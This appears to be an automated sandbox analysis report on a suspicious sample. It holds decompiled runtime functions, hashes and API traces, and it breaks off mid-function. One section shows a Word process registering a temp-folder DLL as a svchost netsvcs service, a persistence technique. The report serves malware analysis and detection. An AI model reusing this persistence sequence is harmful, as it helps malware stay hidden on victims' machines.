					if(_t33 != 1 || ( *(_t13 + 0x98) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x60) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E010774BE(2);
						if(E010774BE(1) == _t21) {
							goto L1;
						}
						L7:
						if(CloseHandle(E010774BE(_t33)) != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E0107742D(_t33);
						 *((char*)( *((intOrPtr*)(0x10841d0 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x38)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E01073922(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}

0x0107a2ab
0x0107a2b8
0x0107a2be
0x0107a2c6
0x0107a2d4
0x00000000
0x00000000
0x00000000
0x00000000
0x0107a2dc
0x0107a2dc
0x0107a2de
0x0107a2f0
0x00000000
0x00000000
0x0107a2f2
0x0107a302
0x00000000
0x00000000
0x0107a30a
0x0107a30c
0x0107a30d
0x0107a325
0x0107a32c
0x00000000
0x0107a33a
0x00000000
0x0107a335
0x0107a2c6
0x0107a2ba
0x0107a2ba
0x00000000

APIs

CloseHandle.KERNEL32(00000000,00000000,?,?,0107A1D2,?,01082580,0000000C,0107A284,?,?,?), ref: 0107A2FA
GetLastError.KERNEL32(?,0107A1D2,?,01082580,0000000C,0107A284,?,?,?), ref: 0107A304
__dosmaperr.LIBCMT ref: 0107A32F

Strings

hd, xrefs: 0107A2BE

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: hd
API String ID: 2583163307-2937536798
Opcode ID: 9f51ed672d963fc0e13b5de099058516f5a676b5704f5f768d251624ca0584d5
Instruction ID: b8a0abbb59cea7f2eba537408d51face6843e3c0525607326db2e729079c6f13
Opcode Fuzzy Hash: 9f51ed672d963fc0e13b5de099058516f5a676b5704f5f768d251624ca0584d5
Instruction Fuzzy Hash: B3010832F041309BD662237C68487AE3B859BD2674F2D4189EDD5972C2EF668C8242AC

Uniqueness

Uniqueness Score: -1.00%

Function 010750EA, Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E010750EA(void* __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x1083060; // 0x5
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E010766B7(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E010754A9(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E010766B7(__eflags,  *0x1083060, _t51);
							if(__eflags != 0) {
								E01074F18(_t51, 0x10843e4);
								E01074D72(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E010766B7(__eflags,  *0x1083060, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E010766B7(0,  *0x1083060, 0);
							_push(0);
							L9:
							E01074D72();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E01076678(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x1083060; // 0x5
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E01074BE9(_t39, _t43, _t49, _t60);
					asm("int3");
					_t5 =  *0x1083060; // 0x5
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E010766B7(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E010754A9(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E010766B7(__eflags,  *0x1083060, _t60);
								if(__eflags != 0) {
									E01074F18(_t60, 0x10843e4);
									E01074D72(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E010766B7(__eflags,  *0x1083060, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E010766B7(__eflags,  *0x1083060, _t20);
								_push(_t60);
								L25:
								E01074D72();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E01076678(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x1083060; // 0x5
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E01074BE9(_t39, _t43, _t49, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x1083060; // 0x5
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E010766B7(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E010754A9(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E010766B7(__eflags,  *0x1083060, _t54);
											if(__eflags != 0) {
												E01074F18(_t54, 0x10843e4);
												E01074D72(0);
												goto L45;
											} else {
												_t40 = 0;
												E010766B7(__eflags,  *0x1083060, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E010766B7(0,  *0x1083060, 0);
											_push(0);
											L41:
											E01074D72();
											goto L36;
										}
									}
								} else {
									_t54 = E01076678(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x1083060; // 0x5
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x010750ea
0x010750ea
0x010750f5
0x010750f7
0x010750fc
0x010750ff
0x0107511d
0x01075120
0x01075125
0x01075127
0x00000000
0x01075129
0x01075135
0x01075138
0x01075139
0x0107513b
0x01075160
0x01075162
0x0107517b
0x01075182
0x01075187
0x00000000
0x01075164
0x01075164
0x0107516d
0x01075172
0x00000000
0x01075172
0x0107513d
0x0107513d
0x0107513d
0x01075146
0x0107514b
0x0107514c
0x0107514c
0x01075151
0x00000000
0x01075151
0x0107513b
0x01075101
0x01075107
0x0107510b
0x01075118
0x00000000
0x0107510d
0x01075110
0x0107518a
0x0107518a
0x01075112
0x01075112
0x01075112
0x01075114
0x01075114
0x01075114
0x01075110
0x0107510b
0x0107518d
0x01075195
0x01075197
0x01075199
0x010751a1
0x010751a6
0x010751a7
0x010751ac
0x010751ad
0x010751b0
0x010751ca
0x010751cd
0x010751d2
0x010751d4
0x00000000
0x010751d6
0x010751e2
0x010751e5
0x010751e6
0x010751e8
0x0107520b
0x0107520d
0x01075224
0x0107522b
0x01075230
0x00000000
0x0107520f
0x01075216
0x0107521b
0x00000000
0x0107521b
0x010751ea
0x010751f1
0x010751f6
0x010751f7
0x010751f7
0x010751fc
0x00000000
0x010751fc
0x010751e8
0x010751b2
0x010751b8
0x010751ba
0x010751bc
0x010751c5
0x00000000
0x010751be
0x010751be
0x010751c1
0x0107523b
0x0107523b
0x01075240
0x01075243
0x01075244
0x01075245
0x0107524c
0x0107524e
0x01075253
0x01075256
0x01075274
0x01075277
0x0107527c
0x0107527e
0x00000000
0x01075280
0x0107528c
0x01075290
0x01075292
0x010752b7
0x010752b9
0x010752d2
0x010752d9
0x00000000
0x010752bb
0x010752bb
0x010752c4
0x010752c9
0x00000000
0x010752c9
0x01075294
0x01075294
0x01075294
0x0107529d
0x010752a2
0x010752a3
0x010752a3
0x00000000
0x010752a8
0x01075292
0x01075258
0x0107525e
0x01075260
0x01075262
0x0107526f
0x00000000
0x01075264
0x01075264
0x01075267
0x010752e1
0x010752e1
0x01075269
0x01075269
0x01075269
0x01075269
0x0107526b
0x0107526b
0x0107526b
0x01075267
0x01075262
0x010752e4
0x010752ec
0x010752ee
0x010752ee
0x010752f5
0x010751c3
0x01075233
0x01075233
0x01075235
0x00000000
0x01075237
0x0107523a
0x0107523a
0x01075235
0x010751c1
0x010751bc
0x0107519b
0x010751a0
0x010751a0

APIs

GetLastError.KERNEL32(?,?,?,01079043,?,00000001,01076F6B,?,01079502,00000001,?,?,?,01076EFA,?,?), ref: 010750EF
_free.LIBCMT ref: 0107514C
_free.LIBCMT ref: 01075182
SetLastError.KERNEL32(00000000,00000005,000000FF,?,01079502,00000001,?,?,?,01076EFA,?,?,?,01082480,0000002C,01076F6B), ref: 0107518D

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: d2a7183bac21a7de5d99a37ba1316afadf6fd9a88116798414a5c034ab966cd9
Instruction ID: 54c840313e6112a5e98d5c1d7a19b17f8a4792016e21d13f20bb0e7522ebe295
Opcode Fuzzy Hash: d2a7183bac21a7de5d99a37ba1316afadf6fd9a88116798414a5c034ab966cd9
Instruction Fuzzy Hash: 1B115C72E18A067BE662317C6C81FEF2559ABE1676B300274F2D4D60C0EE378C014328

Uniqueness

Uniqueness Score: -1.00%

Function 01075241, Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E01075241(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x1083060; // 0x5
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E010766B7(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E010754A9(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E010766B7(__eflags,  *0x1083060, _t18);
							if(__eflags != 0) {
								E01074F18(_t18, 0x10843e4);
								E01074D72(0);
								goto L13;
							} else {
								_t13 = 0;
								E010766B7(__eflags,  *0x1083060, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E010766B7(0,  *0x1083060, 0);
							_push(0);
							L9:
							E01074D72();
							goto L4;
						}
					}
				} else {
					_t18 = E01076678(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x1083060; // 0x5
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x0107524c
0x0107524e
0x01075253
0x01075256
0x01075274
0x01075277
0x0107527c
0x0107527e
0x00000000
0x01075280
0x0107528c
0x01075290
0x01075292
0x010752b7
0x010752b9
0x010752d2
0x010752d9
0x00000000
0x010752bb
0x010752bb
0x010752c4
0x010752c9
0x00000000
0x010752c9
0x01075294
0x01075294
0x01075294
0x0107529d
0x010752a2
0x010752a3
0x010752a3
0x00000000
0x010752a8
0x01075292
0x01075258
0x0107525e
0x01075262
0x0107526f
0x00000000
0x01075264
0x01075267
0x010752e1
0x010752e1
0x01075269
0x01075269
0x01075269
0x0107526b
0x0107526b
0x0107526b
0x01075267
0x01075262
0x010752e4
0x010752ec
0x010752f5

APIs

GetLastError.KERNEL32(?,00000000,?,0107395D,01078335,?,01077007,?,00000000,?,?,?,?,01077052,?,00000000), ref: 01075246
_free.LIBCMT ref: 010752A3
_free.LIBCMT ref: 010752D9
SetLastError.KERNEL32(00000000,00000005,000000FF,?,0107395D,01078335,?,01077007,?,00000000,?,?,?,?,01077052,?), ref: 010752E4

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: b33c0731fcd2f70644c56ed124fc84ea41da9e0a762bc48647a7348aa514be7e
Instruction ID: 32e59a114ad788212d8950d36244c52e96d65d8c484480654e0c9c69a04a6927
Opcode Fuzzy Hash: b33c0731fcd2f70644c56ed124fc84ea41da9e0a762bc48647a7348aa514be7e
Instruction Fuzzy Hash: 1E112971E0C6066AE622217C9C85FEE2559FBE66757340224F5D5D60C4EE278C034328

Uniqueness

Uniqueness Score: -1.00%

Function 0107A136, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0107A136(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x1083870, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0107A11F();
					E0107A0E1();
					_t13 = WriteConsoleW( *0x1083870, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x0107a153
0x0107a157
0x0107a164
0x0107a169
0x0107a184
0x0107a184
0x0107a18a

APIs

WriteConsoleW.KERNEL32(?,?,01076F6B,00000000,?,?,01079B8F,?,00000001,?,00000001,?,01078FD2,00000000,?,00000001), ref: 0107A14D
GetLastError.KERNEL32(?,01079B8F,?,00000001,?,00000001,?,01078FD2,00000000,?,00000001,00000000,00000001,?,01079526,01076EFA), ref: 0107A159

Part of subcall function 0107A11F: CloseHandle.KERNEL32(FFFFFFFE,0107A169,?,01079B8F,?,00000001,?,00000001,?,01078FD2,00000000,?,00000001,00000000,00000001), ref: 0107A12F

___initconout.LIBCMT ref: 0107A169

Part of subcall function 0107A0E1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0107A110,01079B7C,00000001,?,01078FD2,00000000,?,00000001,00000000), ref: 0107A0F4

WriteConsoleW.KERNEL32(?,?,01076F6B,00000000,?,01079B8F,?,00000001,?,00000001,?,01078FD2,00000000,?,00000001,00000000), ref: 0107A17E

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: ca748be1090576c6fd9b2d9a9d809dc69a8afb68261faff7b406a6751e114fe8
Instruction ID: cd00e5fa066c85d10e40e907f2ea07f355e8080cd7929e278fc6fda1a24e88f6
Opcode Fuzzy Hash: ca748be1090576c6fd9b2d9a9d809dc69a8afb68261faff7b406a6751e114fe8
Instruction Fuzzy Hash: F2F0F836900219FBCF222ED5EC08A8D3F66FF486B0B048050FB9896120C637C8609B95

Uniqueness

Uniqueness Score: -1.00%

Function 01074719, Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01074719() {

				E01074D72( *0x10843f0);
				 *0x10843f0 = 0;
				E01074D72( *0x10843f4);
				 *0x10843f4 = 0;
				E01074D72( *0x10840e0);
				 *0x10840e0 = 0;
				E01074D72( *0x10840e4);
				 *0x10840e4 = 0;
				return 1;
			}

0x01074722
0x0107472f
0x01074735
0x01074740
0x01074746
0x01074751
0x01074757
0x0107475f
0x01074768

APIs

_free.LIBCMT ref: 01074722

Part of subcall function 01074D72: HeapFree.KERNEL32(00000000,00000000,?,010776B9,?,00000000,?,?,?,010776E0,?,00000007,?,?,01077BA2,?), ref: 01074D88
Part of subcall function 01074D72: GetLastError.KERNEL32(?,?,010776B9,?,00000000,?,?,?,010776E0,?,00000007,?,?,01077BA2,?,?), ref: 01074D9A

_free.LIBCMT ref: 01074735
_free.LIBCMT ref: 01074746
_free.LIBCMT ref: 01074757

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3debecf91a3ebff133225a38e9681a991a1b00032e320fc2d164fee18731118a
Instruction ID: 03fd9a2b9ea2b8b216c76d715ef2f34c9b9cc92341153972ff874eacef3fa300
Opcode Fuzzy Hash: 3debecf91a3ebff133225a38e9681a991a1b00032e320fc2d164fee18731118a
Instruction Fuzzy Hash: ADE0B679C189639A86337F24B900B8F3A61F774700341850AF6D1D6218EB3F09269FC9

Uniqueness

Uniqueness Score: -1.00%

Function 01075D87, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E01075D87(void* __edx, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				void* _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __ebx;
				void* __ebp;
				char _t39;
				char _t48;
				char _t51;
				char _t58;
				signed int _t63;
				signed int _t64;
				void* _t75;
				void* _t80;
				signed int _t85;

				_t78 = __edx;
				_push(_a16);
				_push(_a12);
				E01075EA0(__edx, __eflags);
				_t39 = E01075B30(__eflags, _a4);
				_v16 = _t39;
				if(_t39 !=  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					_push(_t63);
					_t80 = E010777CF(0x220);
					_t64 = _t63 | 0xffffffff;
					__eflags = _t80;
					if(__eflags == 0) {
						L5:
						_t85 = _t64;
					} else {
						_t80 = memcpy(_t80,  *(_a12 + 0x48), 0x88 << 2);
						 *_t80 =  *_t80 & 0x00000000;
						_t85 = E01075F9B(_t64, _t78, __eflags, _v16, _t80);
						__eflags = _t85 - _t64;
						if(__eflags != 0) {
							__eflags = _a8;
							if(_a8 == 0) {
								E010749E6();
							}
							asm("lock xadd [eax], ebx");
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								_t58 = _a12;
								__eflags =  *((intOrPtr*)(_t58 + 0x48)) - 0x1083068;
								if( *((intOrPtr*)(_t58 + 0x48)) != 0x1083068) {
									E01074D72( *((intOrPtr*)(_t58 + 0x48)));
								}
							}
							 *_t80 = 1;
							_t75 = _t80;
							_t80 = 0;
							 *(_a12 + 0x48) = _t75;
							_t48 = _a12;
							__eflags =  *(_t48 + 0x350) & 0x00000002;
							if(( *(_t48 + 0x350) & 0x00000002) == 0) {
								__eflags =  *0x1083750 & 0x00000001;
								if(__eflags == 0) {
									_v24 =  &_a12;
									_v20 =  &_a16;
									_t51 = 5;
									_v16 = _t51;
									_v12 = _t51;
									_push( &_v16);
									_push( &_v24);
									_push( &_v12);
									E01075A22(__eflags);
									__eflags = _a8;
									if(_a8 != 0) {
										 *0x1083644 =  *_a16;
									}
								}
							}
						} else {
							 *((intOrPtr*)(E01073958(__eflags))) = 0x16;
							goto L5;
						}
					}
					E01074D72(_t80);
					return _t85;
				} else {
					return 0;
				}
			}

0x01075d87
0x01075d8f
0x01075d92
0x01075d95
0x01075d9d
0x01075da8
0x01075db1
0x01075db7
0x01075dc4
0x01075dc6
0x01075dca
0x01075dcc
0x01075dfc
0x01075dfc
0x01075dce
0x01075ddb
0x01075de1
0x01075de9
0x01075ded
0x01075def
0x01075e0c
0x01075e10
0x01075e12
0x01075e12
0x01075e1d
0x01075e21
0x01075e22
0x01075e24
0x01075e27
0x01075e2e
0x01075e33
0x01075e38
0x01075e2e
0x01075e39
0x01075e3f
0x01075e44
0x01075e46
0x01075e49
0x01075e4c
0x01075e53
0x01075e55
0x01075e5c
0x01075e61
0x01075e6c
0x01075e6f
0x01075e70
0x01075e73
0x01075e79
0x01075e7d
0x01075e81
0x01075e82
0x01075e87
0x01075e8b
0x01075e96
0x01075e96
0x01075e8b
0x01075e5c
0x01075df1
0x01075df6
0x00000000
0x01075df6
0x01075def
0x01075dff
0x01075e0b
0x01075db3
0x01075db6
0x01075db6

APIs

Part of subcall function 01075B30: GetOEMCP.KERNEL32(00000000,01075DA2,01078C59,00000000,?,?,00000000,?,01078C59), ref: 01075B5B

_free.LIBCMT ref: 01075DFF

Strings

pr, xrefs: 01075E96

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: pr
API String ID: 269201875-2331350302
Opcode ID: ffac0d95216135faf059871368c74817bf240a7e7c62e627858e79272ba6378f
Instruction ID: 2c1d17ec6bc189ef91334743497ab3b6b0474f19042395b130691647659cd487
Opcode Fuzzy Hash: ffac0d95216135faf059871368c74817bf240a7e7c62e627858e79272ba6378f
Instruction Fuzzy Hash: 4C31AB72D0424AAFDB12EF68C884ADE7BE4FF44310F1144A9E9919B2A1EB329C51CB54

Uniqueness

Uniqueness Score: -1.00%

Function 010713B5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010713B5(intOrPtr* __ecx, void* __eflags) {
				intOrPtr* _t13;

				_t13 = __ecx;
				E01071408(__ecx);
				 *__ecx = 0x38;
				 *((intOrPtr*)(__ecx + 8)) = 0x1070000;
				 *((intOrPtr*)(__ecx + 4)) = 0x1070000;
				 *((intOrPtr*)(__ecx + 0xc)) = 0xe00;
				 *((intOrPtr*)(__ecx + 0x10)) = 0x107d1d0;
				if(E01071390(0x1070000, __ecx + 0x14) < 0) {
					if(IsDebuggerPresent() != 0) {
						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
					}
					 *0x10845b8 = 1;
				}
				return _t13;
			}

0x010713b6
0x010713b8
0x010713c2
0x010713cb
0x010713ce
0x010713d1
0x010713d8
0x010713e6
0x010713f0
0x010713f7
0x010713f7
0x010713fd
0x010713fd
0x01071407

APIs

Part of subcall function 01071390: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,010713E4,?,?,?,0107100A), ref: 01071395
Part of subcall function 01071390: GetLastError.KERNEL32(?,?,?,0107100A), ref: 0107139F

IsDebuggerPresent.KERNEL32(?,?,?,0107100A), ref: 010713E8
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0107100A), ref: 010713F7

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 010713F2

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: 7c111d83116b5db6281bff36d901b34e774f98fd50b95af52e2e2e9cef3edccd
Instruction ID: 13e33f0b195e644ed9bc010efa9a63318a6fef963f82c352b2f9354bb08bffec
Opcode Fuzzy Hash: 7c111d83116b5db6281bff36d901b34e774f98fd50b95af52e2e2e9cef3edccd
Instruction Fuzzy Hash: 42E06D70E003028BD3719F65E4083467BE4BF04255F00895CE9C1E7A80DBB5E0468BA5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: WINWORD.EXE PID: 5572 Parent PID: 6004 WINWORD.EXECOMMON

Executed Functions

Function 0303107D, Relevance: 38.7, APIs: 15, Strings: 7, Instructions: 247registryserviceCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00000003,?), ref: 030310EE
RegGetValueA.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,netsvcs,00000020,00000000,?,?), ref: 0303111A
RegSetValueExA.KERNELBASE(?,netsvcs,00000000,00000007,00000000,?), ref: 030311E5
OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 030311FA
GetLastError.KERNEL32 ref: 0303120C
FindCloseChangeNotification.KERNELBASE(00000000), ref: 03031229
CloseHandle.KERNEL32(00000000), ref: 03031241
CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 030312A1
ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 030312BB
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 0303131B
RegCreateKeyA.ADVAPI32(?,Parameters,?), ref: 03031339
RegSetValueExA.ADVAPI32(?,ServiceDll,00000000,00000002,C:\Users\user\AppData\Local\Temp\edgDDEA.tmp,C:\Users\user\AppData\Local\Temp\edgDDEA.tmp), ref: 03031367
GetLastError.KERNEL32 ref: 03031373
CloseServiceHandle.ADVAPI32(?), ref: 03031387
CloseServiceHandle.ADVAPI32(00000000), ref: 03031392

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 030310DE, 030310E8, 03031114
netsvcs, xrefs: 0303110F, 030311DA
%SystemRoot%\System32\svchost.exe -k netsvcs, xrefs: 03031257
SYSTEM\CurrentControlSet\Services\, xrefs: 030312C4
C:\Users\user\AppData\Local\Temp\edgDDEA.tmp, xrefs: 03031343, 03031356, 03031357
Parameters, xrefs: 0303132E
ServiceDll, xrefs: 0303135C

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: CloseService$HandleOpenValue$ChangeCreateErrorLast$Config2FindManagerNotification
String ID: %SystemRoot%\System32\svchost.exe -k netsvcs$C:\Users\user\AppData\Local\Temp\edgDDEA.tmp$Parameters$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$SYSTEM\CurrentControlSet\Services\$ServiceDll$netsvcs
API String ID: 3171096773-3440416071
Opcode ID: 78911a5974a861eb1e914b87547b0105b86b939690b5e05e9c17e87dca5b8b77
Instruction ID: 6f59258a6960ab43b0332b22d07a66063b4dd4e5a9cf5a4f999633beb1f18214
Opcode Fuzzy Hash: 78911a5974a861eb1e914b87547b0105b86b939690b5e05e9c17e87dca5b8b77
Instruction Fuzzy Hash: 458109B9942218BBDB35EF24DC45BEA77BCAB09300F0405E9E909E7241D7719FA48F90

Uniqueness

Uniqueness Score: -1.00%

Function 6D8611F0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 146
filethreadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E6D8611F0(void* __ebx, void* __edi, void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				struct _SECURITY_DESCRIPTOR _v52;
				struct _SECURITY_ATTRIBUTES _v64;
				void* _v68;
				long _v72;
				long _v76;
				void* _v80;
				void _v84;
				void* __ebp;
				signed int _t34;
				signed int _t35;
				void* _t43;
				void* _t44;
				void* _t51;
				void* _t53;
				void _t57;
				void _t58;
				void* _t61;
				void* _t64;
				intOrPtr _t70;
				void* _t72;
				void* _t77;
				intOrPtr _t78;
				void* _t80;
				void _t83;
				signed int _t84;
				void* _t85;

				_push(0xfffffffe);
